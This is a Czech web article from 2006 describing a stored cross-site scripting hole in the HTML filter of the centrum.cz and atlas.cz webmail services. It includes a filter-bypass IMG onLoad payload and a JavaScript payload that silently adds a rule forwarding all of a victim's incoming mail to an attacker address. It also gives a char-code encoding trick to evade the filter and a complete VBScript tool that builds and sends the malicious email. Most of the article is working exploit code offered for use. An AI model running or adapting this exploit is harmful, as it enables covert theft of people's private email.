Zpět na seznam článků     Číst komentáře (6)     Verze pro tisk

Exploit na mail u centrum.cz a atlas.cz

Autor: dayvee   
29.6.2006

sysel2001 objevil bezpečnostní trhlinu na dvou velkých českých freemailech atlas.cz a centrum.cz, pomocí které je možné číst poštu libovolného uživatele.


Zranitelnost se nachází ve filtru, který odstraňuje potencionálně nebezpečné HTML elementy, nacházející se v obsahu došlých emailů, formátovaných pomocí HTML. Pomocí speciálně napsaného HTML kódu je možné filtr obejít a vložit do těla emailu JavaScript. Pokud se uživatel přihlásí ke svému účtu přes webové rozhraní a zlomyslný e-mail otevře, script se provede v kontextu jeho session s webovým serverem.

Filtr kontrolující došlé emaily parsuje jejich obsah tak, že všechno, co se nachází mezi znaky < > považuje za HTML tag, a to ostatní mimo za text. V obsahu HTML tagu, tedy v řetězci, začínajícim znakem < a končící znakem > pak hledá výskyt určitých klíčových slov a řetězec, nacházející se mimo nechá bez povšimnutí. Hledaná klíčová slova představují konstrukce, kterými se do HTML kódu vkládají různé client side scripty. Jsou to například názvy tagu jako <SCRIPT>, <OBJECT>, <APPLET>, a pak také názvy atributů onLoad, onKeyPress, onMouseMove atd. Pokud něco takového nalezne, odstraní celý HTML element nebo atribut, spolu s jeho hodnotou, protože tyto scripty umístěné v obsahu emailové zprávy představují riziko pro bezpečnost webové aplikace. Chyba parseru je v tom, že první výskyt znaku > po znaku < považuje vždy za konec HTML tagu, i bez ohledu na to, že se znak > nachází v hodnotě atributu uzavřené uvozovkami.

Např. tento kód

<IMG src="smile.gif" a="><BR>" onLoad="alert('Hello!');" b="<BR">

rozebere parser významově takto:

Tag: <IMG src="obrazek.gif" a=">
Tag: <BR>
Text: " onLoad="alert('Hello!');" b="
Tag: <BR">

Atribut onLoad="alert('Hello!');" se nachází v časti považované parserem za text, a proto ho filtr neodstraní. Webový prohlížeč však část onLoad="alert('Hello!');" bere jako atribut elementu IMG, kterým se přiradí k události onLoad akce prováděná JavaScriptem. Po kompletním načtení obrázku ze zadaného zdroje je vyvolána událost onLoad a JavaScript je proveden. Atributy a="><BR>" a b="<BR" prohlížeč ignoruje.

Když už známe způsob, jak do těla emailu vložit JavaScript, zbývá jenom možnost, jak toho šikovné využit. V uživatelském nastavení emailové schránky je k dispozici funkce tzv. filtrů, prostřednictvím které si může uživatel nastavit např. přeposílání kopií došlých emailů na jím zadanou emailovou adresu. Nastavení se provede vyplněním a odesláním formuláře, ve kterém se zadávají vlastnosti filtru. Formulář se odesílá pomocí HTTP protokolu metodou GET nebo POST. Všechno, co potřebujeme je kód v JavaScriptu, který odešle data z formuláře zvolenou metodou. Příklad takového scriptu, který nastaví filtr pro přeposílání kopií došlých emailů na určitou adresu ve schránce na freemailu centrum.cz je zde


 function createObj (obj) {
  try { 
   return new ActiveXObject(obj); 
  }
  catch(e) { 
   return null; 
  }
 }

 function main() {
  var userDir = "";
  var xmlHttp,p;
  var formData;
  var filterId;
  /* emailova adresa, na kterou bude prichozi posta preposilana */
  var redirToAddr = "test123@domain.cz";

   if (window.XMLHttpRequest) {
    xmlHttp = new XMLHttpRequest();
   }
   else {
    if (xmlHttp = createObj("Msxml2.XMLHTTP")) {
    }
    else {
     if (xmlHttp = createObj("Microsoft.XMLHTTP")) {
     }
	    else {
	     return;
     }
    }
   }
  
   if ((p = location.pathname.indexOf("/",1)) >= 0) {
    userDir = location.pathname.substring(0,p);
   }
   
   xmlHttp.open("POST", location.protocol + "//" + location.host + 
          userDir + "/filters.php");

   filterId = "-" + (300 + Math.ceil(Math.random() * 500));

   formData = "cond_count=1&op=2&fld=0&sort=dd&f_order_top=" + 
    filterId + "&f_order_bottom=0&validity=1&f_hour_begin=0" +
    "&f_hour_end=24&f_cond_1=2&f_arg_1=&folder=0&address=&radio=" +
    "radio7©address=" + escape(redirToAddr) + 
    "&email_notification=&mobil_send_part=" +
    "&mobil_send_part_list=%40sms.eurotel.cz" + 
    "&sms_notification=&sms_notification_list=%40sms.eurotel.cz" + 
    "&auto_reply=&f_order=" + filterId + "&submit=Vlo%9Eit";

   xmlHttp.setRequestHeader("Content-Type", 
                "application/x-www-form-urlencoded");
   xmlHttp.send(formData);
 }

 main();Uvedený JavaScript je vhodné před vložením do odesílaného emailu ještě zakódovat, aby znaky, které obsahuje nijak neovlivňovaly parsování HTML obsahu kontrolním filtrem. Provede se to jednoduše. Posloupnost znaků, ze kterých se JavaScript skládá se převede na posloupnost jejich ASCII hodnot, oddělených čárkou např. řatězac ABCD se konvertuje na 65,66,67,68. K dekódovaní se pak použije metoda fromCharCode() tridy String a řetězec, který vrátí se předá funkci eval(). Funkce eval() vyhodnotí řetězec v jeho původní podobě jako JavaScriptový kód.

<IMG src="smile.gif" a="><BR>" onLoad="eval(String.fromCharCode(32,102,117,110,…))" b="<BR">

Na závěr uvádim WSH script napsaný ve VBScriptu, který email s exploitem sestaví a odešle. Pokud uživatel otevře email odeslany tímto scriptem přes webové rozhraní freemailu centrum.cz, kopie všech zpráv, které následně obdrží budou přeposlány na emalovou adresu, zadávanou jako vstupní argument.

Použití:

C:\CScript exploit.vbs <odesilatel> <prijemce> <presmerovatNa>

<odesilatel> - Email odesilatele
<prijemce> - Email prijemce
<presmerovatNa> - Email, na ktery bude posta preposilana


Option Explicit

Dim Winsock

Main

Sub Ack
Dim buf,received

 buf = ""
 Do Until Right(buf,2) = vbCrLf
  If Winsock.BytesReceived > 0 Then
   Winsock.GetData received, vbString, 1024
   buf = buf & received
  End If
  WScript.Sleep 100
 Loop

 buf = Mid(buf,1,Len(buf) - 2)
 
 If Left(buf,1) > "3" Then
  Err.Raise 1,WScript.ScriptName,"Invalid response from server: " & buf
 End If
 
 WScript.Echo "Response: " & buf
End Sub


Sub Mail(ByVal remoteHost,ByVal remotePort,ByVal mailFrom,ByVal mailTo, _
     ByVal headers,ByVal message)
     
Dim recipients,recipient,reply,sendData

 Set Winsock = CreateObject("MSWinSock.WinSock")

 Winsock.RemoteHost = remoteHost
 Winsock.LocalPort = 0
 Winsock.RemotePort = remotePort
 
 WScript.Echo "Connection to " & remoteHost & ":" & remotePort
 Winsock.Connect
 Do Until Winsock.State = 7
  WScript.Sleep 100
 Loop
 
 ' prijme pozdrav serveru
 Ack
 
 sendData = "HELO 127.0.0.1"
 WScript.Echo "Send: " & sendData 
 Winsock.SendData sendData & vbCrLf
 Ack


 sendData = "MAIL FROM: <" & mailFrom & ">"
 WScript.Echo "Send: " & sendData
 Winsock.SendData sendData & vbCrLf
 Ack
 
 recipients = Split(mailTo,",")
 For Each recipient In recipients
  If recipient <> "" Then 
   sendData = "RCPT TO: <" & recipient & ">" 
   WScript.Echo "Send: " & sendData
   Winsock.SendData sendData & vbCrLf
  End If
  Ack
 Next 
 
 sendData = "DATA"
 WScript.Echo "Send: " & sendData
 Winsock.SendData sendData & vbCrLf
 Ack

 Wscript.Echo "Send message body"
 Winsock.SendData headers & vbCrLf & vbCrLf & message & _ 
          vbCrLf & "." & vbCrLf
 Ack
 
 
 sendData = "QUIT"
 WScript.Echo "Send: " & sendData
 Winsock.SendData sendData & vbCrLf
 WScript.Echo "Close connection"
 Winsock.Close
 
End Sub

Function QuotedPrintableEncode(ByVal str)
Dim i,charCode
Dim line,newLine,encodedChar
Dim length

 length = Len(str)
 i = 1
 Do While i <= length
  charCode = Asc(Mid(str,i,1))
  newLine = False
  If charCode = 13 And i < length Then
    If Mid(str,i + 1,1) = vbLf Then newLine = True
  End If
  
  If newLine Then
   If Right(line,1) = vbTab Or Right(line,1) = " " Then line = line & "="
   QuotedPrintableEncode = QuotedPrintableEncode & line & vbCrLf
   line = ""
   i = i + 1
  Else
   If ((32 <= charCode And charCode < 126) And charCode <> 61) Or _ 
     charCode = 9 Then
     
    encodedChar = Chr(charCode)
   Else
    encodedChar = "=" & Hex(charCode \ 16) & Hex(charCode Mod 16)
   End If
   If Len(line) + Len(encodedChar) > 75 Then
    QuotedPrintableEncode = QuotedPrintableEncode & line & "=" & vbCrLf
    line = encodedChar
   Else
    line = line & encodedChar
   End If
  End if
  i = i + 1
 Loop
 
 If Right(line,1) = vbTab Or Right(line,1) = " " Then line = line & "="
 QuotedPrintableEncode = QuotedPrintableEncode & line
End Function

Function checkEmailAddr(ByVal emailAddr,user,host) 
Dim parts,temp,i,j

 checkEmailAddr = False
 user = ""
 host = ""
 parts = Split(emailAddr,"@")

 If UBound(parts) <> 1 Then
  Exit Function
 End If

 For i = 0 To 1
  temp = LCase(parts(i))
  If Len(temp) > 0 Then
   For j = 1 To Len(temp)
    If Instr("abcdefghijklmnopqrstuvwxyz0123456789._-", _
         Mid(temp,j,1)) = 0 Then
     Exit Function
    End If
   Next
  Else
   Exit Function
  End If
 Next
 
 user = parts(0)
 host = parts(1)
 checkEmailAddr = True
End Function

Function toCharCode(str)
Dim i

 toCharCode = ""
 
 For i = 1 To Len(str) - 1
  toCharCode = toCharCode & CStr(Asc(Mid(str,i,1))) & ","
 Next
 If Len(str) > 0 Then
  toCharCode = toCharCode & CStr(Asc(Mid(str,Len(str),1)))
 End If
 
End Function

Sub Main
Dim host,user
Dim mailFrom,mailTo,redirectTo
Dim header,messageBody,messageText,messageHTML
Dim boundary1,boundary2,imageCid
Dim javaScript
Dim smtpServAddr
Dim i

 If WScript.Arguments.Count <> 3 Then
  WScript.Echo "Pouziti: C:\CScript " & WScript.ScriptName & _
  " <odesilatel> <prijemce> <presmerovatNa>" & vbCrLf & vbCrLf & _
  " <odesilatel> - Email odesilatele" & vbCrLf & _
  " <prijemce> - Email prijemce" & vbCrLf & _
  " <presmerovatNa> - Email, na ktery bude posta presmerovana"
  WScript.Quit 1
  Exit Sub
 End If
 
 For i = 0 To 2
  If Not checkEmailAddr(WScript.Arguments.Item(i),user,host) Then
   WScript.Echo "Chybny E-mail. Argument cislo " & (i + 1)
  Else
   If i = 1 Then
    If LCase(host) <> "centrum.cz" Then
     WScript.Echo "Prijemce musi mit adresu na centrum.cz"
     Exit Sub
    Else
     smtpServAddr = "mail1.centrum.cz"
    End If
   End If
  End If
 Next

 mailFrom = WScript.Arguments.Item(0)
 mailTo = WScript.Arguments.Item(1)
 redirectTo = WScript.Arguments.Item(2)

 javaScript = _
 "32,102,117,110,99,116,105,111,110,32,99,114,101,97,116,101,79," & _
 "98,106,32,40,111,98,106,41,32,123,32,116,114,121,32,123,32,114," & _
 "101,116,117,114,110,32,110,101,119,32,65,99,116,105,118,101,88," & _
 "79,98,106,101,99,116,40,111,98,106,41,59,32,125,32,99,97,116,99," & _
 "104,40,101,41,32,123,32,114,101,116,117,114,110,32,110,117,108," & _
 "108,59,32,125,32,125,32,102,117,110,99,116,105,111,110,32,109,97," & _
 "105,110,40,41,32,123,32,118,97,114,32,117,115,101,114,68,105,114," & _
 "32,61,32,34,34,59,32,118,97,114,32,120,109,108,72,116,116,112,44," & _
 "112,59,32,118,97,114,32,102,111,114,109,68,97,116,97,59,32,118," & _
 "97,114,32,102,105,108,116,101,114,73,100,59,32,118,97,114,32,114," & _
 "101,100,105,114,84,111,65,100,100,114,32,61,32,34," & _
 toCharCode(redirectTo) & _
 ",34,59,32,105,102,32,40,119,105,110,100,111,119," & _
 "46,88,77,76,72,116,116,112,82,101,113,117,101,115,116,41,32,123," & _
 "32,120,109,108,72,116,116,112,32,61,32,110,101,119,32,88,77,76," & _
 "72,116,116,112,82,101,113,117,101,115,116,40,41,59,32,125,32,101," & _
 "108,115,101,32,123,32,105,102,32,40,120,109,108,72,116,116,112," & _
 "32,61,32,99,114,101,97,116,101,79,98,106,40,34,77,115,120,109,108," & _
 "50,46,88,77,76,72,84,84,80,34,41,41,32,123,32,125,32,101,108,115," & _
 "101,32,123,32,105,102,32,40,120,109,108,72,116,116,112,32,61,32," & _
 "99,114,101,97,116,101,79,98,106,40,34,77,105,99,114,111,115,111," & _
 "102,116,46,88,77,76,72,84,84,80,34,41,41,32,123,32,125,32,9,32," & _
 "101,108,115,101,32,123,32,9,32,114,101,116,117,114,110,59,32,125," & _
 "32,125,32,125,32,105,102,32,40,40,112,32,61,32,108,111,99,97,116," & _
 "105,111,110,46,112,97,116,104,110,97,109,101,46,105,110,100,101," & _
 "120,79,102,40,34,47,34,44,49,41,41,32,62,61,32,48,41,32,123,32," & _
 "117,115,101,114,68,105,114,32,61,32,108,111,99,97,116,105,111,110," & _
 "46,112,97,116,104,110,97,109,101,46,115,117,98,115,116,114,105," & _
 "110,103,40,48,44,112,41,59,32,125,32,120,109,108,72,116,116,112," & _
 "46,111,112,101,110,40,34,80,79,83,84,34,44,32,108,111,99,97,116," & _
 "105,111,110,46,112,114,111,116,111,99,111,108,32,43,32,34,47,47," & _
 "34,32,43,32,108,111,99,97,116,105,111,110,46,104,111,115,116,32," & _
 "43,32,117,115,101,114,68,105,114,32,43,32,34,47,102,105,108,116," & _
 "101,114,115,46,112,104,112,34,41,59,32,102,105,108,116,101,114," & _
 "73,100,32,61,32,34,45,34,32,43,32,40,51,48,48,32,43,32,77,97,116," & _
 "104,46,99,101,105,108,40,77,97,116,104,46,114,97,110,100,111,109," & _
 "40,41,32,42,32,53,48,48,41,41,59,32,102,111,114,109,68,97,116,97," & _
 "32,61,32,34,99,111,110,100,95,99,111,117,110,116,61,49,38,111,112," & _
 "61,50,38,102,108,100,61,48,38,115,111,114,116,61,100,100,38,102," & _
 "95,111,114,100,101,114,95,116,111,112,61,34,32,43,32,102,105,108," & _
 "116,101,114,73,100,32,43,32,34,38,102,95,111,114,100,101,114,95," & _
 "98,111,116,116,111,109,61,48,38,118,97,108,105,100,105,116,121," & _
 "61,49,38,102,95,104,111,117,114,95,98,101,103,105,110,61,48,38," & _
 "102,95,104,111,117,114,95,101,110,100,61,50,52,34,32,43,32,34," & _
 "38,102,95,99,111,110,100,95,49,61,50,38,102,95,97,114,103,95,49," & _
 "61,38,102,111,108,100,101,114,61,48,38,97,100,100,114,101,115,115," & _
 "61,38,114,97,100,105,111,61,114,97,100,105,111,55,38,99,111,112," & _
 "121,97,100,100,114,101,115,115,61,34,32,43,32,101,115,99,97,112," & _
 "101,40,114,101,100,105,114,84,111,65,100,100,114,41,32,43,32,34," & _
 "38,101,109,97,105,108,95,110,111,116,105,102,105,99,97,116,105," & _
 "111,110,61,38,109,111,98,105,108,95,115,101,110,100,95,112,97," & _
 "114,116,61,38,109,111,98,105,108,95,115,101,110,100,95,112,97," & _
 "114,116,95,108,105,115,116,61,37,52,48,115,109,115,46,101,117,114," & _
 "111,116,101,108,46,99,122,34,32,43,32,34,38,115,109,115,95,110," & _
 "111,116,105,102,105,99,97,116,105,111,110,61,38,115,109,115,95," & _
 "110,111,116,105,102,105,99,97,116,105,111,110,95,108,105,115,116," & _
 "61,37,52,48,115,109,115,46,101,117,114,111,116,101,108,46,99,122," & _
 "38,97,117,116,111,95,114,101,112,108,121,61,34,32,43,32,34,38," & _
 "102,95,111,114,100,101,114,61,34,32,43,32,102,105,108,116,101,114," & _
 "73,100,32,43,32,34,38,115,117,98,109,105,116,61,86,108,111,37," & _
 "57,69,105,116,34,59,32,120,109,108,72,116,116,112,46,115,101,116," & _
 "82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110," & _
 "116,101,110,116,45,84,121,112,101,34,44,32,34,97,112,112,108,105," & _
 "99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109," & _
 "45,117,114,108,101,110,99,111,100,101,100,34,41,59,32,120,109,108," & _
 "72,116,116,112,46,115,101,110,100,40,102,111,114,109,68,97,116," & _
 "97,41,59,32,125,32,109,97,105,110,40,41,59,32" Randomize
 imageCid = Replace(Cstr(Rnd * 1000000),",","_") & "@ABCDEF"

 messageText = "Zdravim, tohle je email, ktery obsahuje skodlivy kod. " & _
 "Jste-li prihlaseni pres webove rozhrani a otevreli jste ho, mam od " & _
 "tohoto okamziku moznost cist veskerou postu, ktera Vam prijde."
 
 messageHTML = messageText & "<IMG src=" & Chr(34) & "cid:" & imageCid & _
 Chr(34) & " a=" & Chr(34) & "><BR>" & Chr(34) & " onLoad=" & Chr(34) & _
 "eval(String.fromCharCode(" & javaScript & "));" & Chr(34) & _
 " b=" & Chr(34) & "<BR" & Chr(34) & ">"

 boundary1 = "=ABCDEF_000001"
 boundary2 = "=ABCDEF_000002"
 
 header = _
 "From: <" & mailFrom & ">" & vbCrLf & _
 "To: <" & mailTo & ">" & vbCrLf & _
 "Subject: Dulezite sdeleni" & vbCrLf & _
 "MIME-Version: 1.0" & vbCrLf & _
 "Message-ID: <" & Replace(Cstr(Rnd * 1000000),",","_") & "@ABDCEF"& ">" & _
 vbCrLf & _
 "Content-Type: multipart/related;" & vbCrLf & _
 vbTab & "boundary=" & Chr(34) & boundary1 & Chr(34) & ";" & vbCrLf & _
 vbTab & "type=" & Chr(34) & "multipart/alternative" & Chr(34)

 messageBody = _ 
 "This is a multi-part message in MIME format." & vbCrLf & vbCrLf 

 messageBody = messageBody & _
 "--" & boundary1 & vbCrLf & _
 "Content-Type: multipart/alternative;" & vbCrLf & _
 vbTab & "boundary=" & Chr(34) & boundary2 & Chr(34) & vbCrLf _
 & vbCrLf & vbCrLf 

 messageBody = messageBody & _
 "--" & boundary2 & vbCrLf & _
 "Content-Type: text/plain;" & vbCrLf & _
 vbTab & "charset=" & Chr(34) & "windows-1250" & Chr(34) & vbCrLf & _
 "Content-Transfer-Encoding: quoted-printable" & vbCrLf & vbCrLf & _
 QuotedPrintableEncode(messageText) & vbCrLf & vbCrLf

 messageBody = messageBody & _
 "--" & boundary2 & vbCrLf & _
 "Content-Type: text/html;" & vbCrLf & _
 vbTab & "charset=" & Chr(34) & "windows-1250" & Chr(34) & vbCrLf & _
 "Content-Transfer-Encoding: quoted-printable" & vbCrLf & vbCrLf & _
 QuotedPrintableEncode(messageHTML) & vbCrLf & vbCrLf & _
 "--" & boundary2 & "--" & vbCrLf & vbCrLf
	
 messageBody = messageBody & _
 "--" & boundary1 & vbCrLf & _
 "Content-Type: image/gif;" & vbCrLf & _
  vbTab & "name=" & Chr(34) & "smile.gif" & Chr(34) & vbCrLf & _
 "Content-Transfer-Encoding: base64" & vbCrLf & _
 "Content-ID: <" & imageCid & ">" & vbCrLf & vbCrLf & _
 "R0lGODlhDwAPAMQfACf6FwylAAuYAIX8fET6NhDbABHrABLzAAMsAA/SAA2yA" & _
 "GT7WA/LAA69AJL8" & vbCrLf & _
 "ihDkADr6K378dA7DABv5CjD6II78hXX8apj8kGv7YFb7SRL4AFz7T0/7Qhj5B" & _
 "gAAAP///yH5BAEA" & vbCrLf & _
 "AB8ALAAAAAAPAA8AAAV64CeKXlmO6FcO1kYAJ+pdDrtB02F443xVEQyHojE8C" & _
 "jyVo1JyTUoFBs8T" & vbCrLf & _
 "GURKBGIpIWmUMJhFJpt7cBuKUoZDgAA6uig67YFQ3pp4Ah0IlCZ5BkYFXAoBAgJT" & _
 "RgiEDGgIiEke" & vbCrLf & _
 "RwkmJYiJPQmOCoaYST0efIcxKSqWKSEAOw==" & vbCrLf & vbCrLf & _
 "--" & boundary1 & "--" & vbCrLf 

 Mail smtpServAddr,25,mailFrom,mailTo,header,messageBody

 WScript.ECho vbCrLf & "Message sent"
End SubČlánek naleznete i na autorově stránce: http://callplayer.wz.cz/clanek.txt

(c) sysel2001 .... nasel dayvee

Líbil se Vám článek?
Budeme potěšeni, pokud vás zaujme také reklamní nabídka

Social Bookmarking

     

Hodnocení/Hlasovalo: 0/0

1  2  3  4  5    
(známkování jako ve škole)